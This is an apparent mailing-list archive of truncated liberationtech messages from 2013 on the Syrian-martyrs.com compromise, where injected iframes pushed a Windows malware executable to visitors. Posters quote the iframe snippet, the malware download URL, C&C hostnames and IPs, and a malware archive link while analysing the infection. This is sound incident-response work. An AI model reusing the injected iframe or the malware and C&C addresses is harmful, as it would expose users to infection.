Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus - UPDATE

2013-01-30 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Dear List, Here is more details with credit to: Team Cymru: http://www.team-cymru.org/ > C&C nodes for this version: > > melaniibaby.no-ip.biz 173.0.10.52 ghostsx.8866.org > 192.168.11.1 (so not likely to connect) awrasx10.no-ip.biz > 95.170.198.

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread KheOps
Hello, I wrote a first summary on the case, I will try to keep it up to date with new data, https://words.ceops.eu/posts/Infected%20Syrian%20opposition%20website%20spreads%20malware%20to%20its%20visitors/ ALl the best, KheOps Le 30/01/2013 00:00, SiNA Rabbani a écrit : > > Hi! > > I sent the m

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-30 Thread hadi
Many thanks for posting. I'll spread this to my Syrian friends just to be aware of this. All the best, Hadi On 01/29/2013 11:05 PM, KheOps wrote: > Dear Libtech, > > We just saw that the website : http://www.syrian-martyrs.com is probably > compromised. Every page of the website contains an iFr

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hello, Le 30/01/2013 03:02, SiNA Rabbani a écrit : > Ok. I infected an old Windoes xp with this malware and it keeps > sending SYN requests to this hostname: awrasx10.no-ip.biz which > currently resolved to: 37.236.124.197 and is down for me. Thank you for your work :) The hostname still resolves

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 Ok. I infected an old Windoes xp with this malware and it keeps sending SYN requests to this hostname: awrasx10.no-ip.biz which currently resolved to: 37.236.124.197 and is down for me. - --SiNA Internet Protocol Version 4, Src: 10.10.10.17 (10.10.1

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
Hi! I sent the malware to a couple of friends that have a setup ready. If you want to try this it might be fun: http://docs.cuckoosandbox.org/en/latest/ All the best, SiNA KheOps: > Hey, > > Le 29/01/2013 23:34, SiNA Rabbani a écrit : >> This is the malware: >>> https://www.virustotal.com/fil

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread Andrew Lewis
Just a heads up the sites been taken down, malware is here: https://resources.telecomix.ceops.eu/material/malwares/ Also looking at getting access to the server in question for forensics. -Andrew On Jan 30, 2013, at 11:34 AM, SiNA Rabbani wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA512

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Hey, Le 29/01/2013 23:34, SiNA Rabbani a écrit : > This is the malware: >> https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/ Yes, saw that too. However, I don't find any precise description of its behaviour. Like, what it does, if it opens

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This is the malware: > https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/ - --SiNA SiNA > Rabbani: > holly shit: > > src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.ex

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread SiNA Rabbani
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 holly shit: http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"; border="0" frameborder="0"> :/ if you are running windows don't even go there!!! Andrew Lewis: > I can get to this in 6 hours or so, maybe someone is willing to > ju

Re: [liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread Andrew Lewis
I can get to this in 6 hours or so, maybe someone is willing to jump on this before then? -Andrew On Jan 30, 2013, at 11:06 AM, KheOps wrote: > Dear Libtech, > > We just saw that the website : http://www.syrian-martyrs.com is probably > compromised. Every page of the website contains an iFrame

[liberationtech] Syrian-martyrs.com website probably compromised by virus

2013-01-29 Thread KheOps
Dear Libtech, We just saw that the website : http://www.syrian-martyrs.com is probably compromised. Every page of the website contains an iFrame which links to a .exe file which is detected as a virus by antivirus software: http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe The fac